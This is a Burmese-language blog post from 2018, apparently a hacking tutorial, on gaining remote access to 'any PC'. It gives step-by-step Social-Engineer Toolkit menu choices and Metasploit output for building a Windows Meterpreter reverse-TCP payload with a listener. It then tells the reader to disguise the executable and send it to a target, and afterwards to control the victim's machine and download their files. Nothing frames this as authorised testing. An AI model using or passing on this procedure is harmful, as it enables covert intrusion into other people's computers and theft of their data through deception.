Wednesday, January 10, 2018

Remote access to any PC


Remote access to any PC

ဒီတစ္ခါေတာ့ Hacking Trick တစ္ခုျဖစ္တဲ့ မည္သည့္ pc ကိုမဆို remotele access ရယူႏိုင္မယ့္ setoolkit ရဲ႕ module တစ္ခုကို အသံုးျပဳရေအာင္ပါ။
Terminal ကေန setoolkit လို႔ ရိုက္ေခၚလိုက္ပါ.

root@kmn:~#  setoolkit

Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

Social Engineering ကို သံုးမွာမို႔ 1 ေရြးျပီး enter ရပါမယ္


set> 1

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.


set>


ထပ္ေပၚလာတဲ့ထဲကမွ   4) Create a Payload and Listener ကို အသံုးျပဳမွာမို႔ 4 ႏွိပ္ျပီး enter ေပါ့
set> 4

 1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   7) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
   8) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and use Reverse Meterpreter
   9) Download/Run your Own Executable        Downloads an executable and runs it

set:payloads>

windows ကေန remote access ရယူဖို႔ ႀကိဳးစားမွာျဖစ္လို႔ 2) Windows Reverse_TCP Meterpreter ကို ေရြးပါမယ္။ သူ႔ကို ေနာက္ဆက္တြဲအျဖစ္ ရွင္းျပထားေသးတာေၾကာင့္ ပိုျပီး အဆင္ေျပပါတယ္။
Spawn a meterpreter shell on victim and send back to attacker ဆိုျပီး ရွင္းရွင္းေလး ေရးထားတာကို ျမင္ႏိုင္ပါတယ္။
set:payloads>2

set:payloads> IP address for the payload listener (LHOST):192.168.10.10 

IP ထည့္
set:payloads> Enter the PORT for the reverse listener:443
port ထည့္ျပီး enter တာနဲ႔ ေအာက္ပါအတိုင္း ေပၚလာပါမယ္
[*] Generating the payload.. please be patient.
[*] Payload has been exported to the default SET directory located under: /root/.set//payload.exe
set:payloads> Do you want to start the payload and listener now? (yes/no):yes

listener ကို စမလား ေမးပါတယ္။ yes  ေျဖျပီး enter လိုက္ပါ

set:payloads> Do you want to start the payload and listener now? (yes/no):yes
[*] Launching msfconsole, this could take a few to load. Be patient...
                                               
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.com


Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/.set//meta_config for ERB directives.
resource (/root/.set//meta_config)> use multi/handler
resource (/root/.set//meta_config)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.set//meta_config)> set LHOST 192.168.10.10
LHOST => 192.168.10.10
resource (/root/.set//meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set//meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set//meta_config)> exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.10.10:443
msf exploit(handler) > [*] Starting the payload handler...

အထက္ပါအတိုင္း စတင္ေနတာကို ေတြ႔ျမင္ရပါမယ္။  ေနာက္ထပ္ terminal တစ္ခု ထပ္ဖြင့္ပါ။

root@kmn:~#  cd .set
root@kmn:~/.set# ls
meta_config  payload.exe  set.options  version.lock

ဆိုျပီး ၾကည့္ရင္ ကြ်န္ေတာ္တို႔ တည္ေဆာက္ထားတဲ့ payload.exe ကို ေတြ႔ျမင္ရပါျပီ။ Terminal ကေနပဲ Dekstop ေပၚကို ေရႊ႕လိုက္ၾကရေအာင္
ေရႊ႕ဖို႔ command က mv (move) ပါ

root@kmn:~#  cd .set
root@kmn:~/.set# ls
meta_config  payload.exe  set.options  version.lock
root@kmn:~/.set# mv payload.exe /root/Desktop
mv က move လို႔ ေျပာျခင္းျဖစ္ျပီး payload.exe က file name  ျဖစ္ပါတယ္။ /root/Desktop ကေတာ့ Directory ပါ။ ေရႊ႕မယ့္ေနရာေပါ့။
ေရႊ႕ျပီးျပီဆိုတာနဲ႔ ကြ်န္ေတာ္တို႔ ရရွိလာတဲ့ ဖိုင္ကို အဆင္ေျပရာနာမည္ေပးျပီး target ထံ ေရာက္ေအာင္ ပို႔ရပါမယ္။ သူ႔ဆီေရာက္ျပီး ႏွိပ္ၾကည့္မိျပီဆိုတာနဲ႔ ကြ်န္ေတာ္တို႔ သူ႔ကြန္ပ်ဴတာထဲကို ဝင္ေရာက္ႏိုင္ျပီျဖစ္ပါတယ္

သတိျပဳဖို႔ လိုတာက ကြ်န္ေတာ္တို႔ဘက္က စက္ ပိတ္မသြားဖို႔ပဲ ျဖစ္ပါတယ္။ အင္တာနက္လိုင္းလည္း ရွိေနရမွာျဖစ္ပါတယ္
သူ႔ဆီ ေရာက္သြားတဲ့အခါမွာေတာ့ session -i 1 ကို အသံုးျပဳျပီး ထိန္းခ်ဳပ္ႏိုင္ျပီျဖစ္သလို setdesktop ကို အသံုးျပဳျပီး သူ႔ Desktop ေပၚ တင္ထားတာေတြကို ၾကည့္ျမင္ႏိုင္မွာျဖစ္သလို စက္ကို reboot  လုပ္တာ စတာေတြကို ဖန္တီးႏိုင္မွာျဖစ္ပါတယ္။ ဒါ့ျပင္ download filename Directory ကို အသံုးျပဳျပီး ကိုယ္လိုခ်င္တဲ့ ေဒတာေတြကို ကူးယူႏိုင္ပါေသးတယ္။ ဥပမာ သူ႔ဆီက a.txt ဖိုင္ကို ကူးမယ္ဆိုပါေတာ့
download a.txt /root/Desktop/ ေရးျပီး enter လိုက္တာနဲ႔ အဲသည္ဖိုင္က ကြ်န္ေတာ္တို႔  Desktop ေပၚ ေရာက္လာမွာျဖစ္ပါတယ္။
.
Hacking ရဲ႕ အေျခခံ သေဘာတရားေလးေတြနဲ႔ Hacking ကို အေျခခံကေန စတင္ ေလ့လာလိုသူေတြအတြက္ ကြ်န္ေတာ္ ေရးသားထားတဲ့
လြယ္ကူေလ့လာ အေျခခံ Hacking နည္းပညာ စာအုပ္ေလးကို ဖတ္ရႈေလ့လာႏိုင္သလို
စာအုပ္ရဲ႕ စာမ်က္ႏွာ ၁၁ မွာ ပါဝင္တဲ့ Member Form ကို ျဖည့္ျပီး ဓာတ္ပံုရိုက္ ေပးပို႔ျခင္းအားျဖင့္ ေနာက္ဆက္တြဲ အြန္လိုင္းသင္ခန္းစာမ်ားကိုပါ အခမဲ့ ဆက္လက္ ေလ့လာႏိုင္ပါတယ္
.
စာအုပ္မွာယူလိုပါက
ကြ်န္ေတာ့္ရဲ႕ Facebook Page Message မွ ျဖစ္ေစ
Viber 09 976 41 3560 တို႔မွ ျဖစ္ေစ ဆက္သြယ္စံုစမ္း မွာယူႏိုင္ပါတယ္ခင္ဗ်ာ
.
ဝင္ေရာက္ဖတ္ရႈအားေပးသူအေပါင္းကို အထူးေက်းဇူးပါ


Thanks


Khit Minnyo

0 comments:

Post a Comment